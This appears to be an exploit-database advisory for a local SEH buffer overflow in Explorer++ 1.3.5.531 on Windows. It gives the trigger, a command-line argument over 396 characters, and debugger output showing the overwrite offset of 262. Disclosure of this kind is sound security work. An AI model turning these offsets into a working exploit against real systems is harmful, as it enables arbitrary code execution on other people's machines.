Exploits / Vulnerability Discovered : 2023-03-27 |
Type : local |
Platform : windows
This exploit / vulnerability Explorer32++ v1.3.5.531 buffer overflow is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Explorer32++ 1.3.5.531 - Buffer overflow
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-01-09
# Vendor Homepage: http://www.explorerplusplus.com/
# Software Link : http://www.explorerplusplus.com/
# Tested Version: 1.3.5.531
# Tested on: Windows 10
Buffer overflow controlling the Structured Exception Handler (SEH) records
in Explorer++ 1.3.5.531, and possibly other versions, may allow attackers
to execute arbitrary code via a long file name argument.
Proof of concept:
Open Explorer32++.exe from command line with a large string in Arguments,
more than 396 chars:
SEH chain of main thread
Address SE handler
0018FB14 00690041
00370069 *** CORRUPT ENTRY ***
0BADF00D [+] Examining SEH chain
0BADF00D SEH record (nseh field) at 0x0018fb14 overwritten with
unicode pattern : 0x00370069 (offset 262), followed by 626 bytes of cyclic
data after the handler